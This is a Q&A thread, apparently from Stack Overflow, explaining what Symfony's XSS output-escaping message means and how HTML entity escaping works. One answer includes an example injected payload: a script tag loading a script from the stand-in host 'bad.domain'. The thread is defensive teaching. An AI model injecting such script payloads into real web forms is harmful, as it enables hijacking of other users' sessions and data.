views:

245

answers:

2

To prevent XSS attacks, output escaping has been enabled;

The above is from symfony,but I don't understand.

A: 

XSS, or Cross Site Scripting is when someone else gets their javascript to be served up by your server. If, for example, you can get random javascript to get served from google.com then you can have that javascript send you everything google knows about the person to whom it's been served.

The avoid this data that may have come from users (rather than from the server / content author) has angle-brackets and other HTML-like stuff escaped so that it won't be executed by end users.

Ry4an
Do you mean by changing `<` to `"` and so on?
You wouldn't change `<` to `"`. You'd change it to `<`.
Anon.
Yes, changing important metacharacters into entities that display the right glyph, but don't have the same processing effects.
Ry4an
+3  A: 

XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually javascript) onto someone else's website, where it can run maliciously.

XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter My name is <script src="http://bad.domain/evilscript.js"&gt;&lt;/script&gt;. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.

In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malcious HTML from rendering. Escaping these characters involves turning them into their entity equivalents &lt; and &gt; (see PHP's htmlspecialchars() function), which will not be interpreted as HTML tags by a browser.

What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.

zombat
Please also note escaping depends on context. See http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet especially the XSS prevention rules
Erlend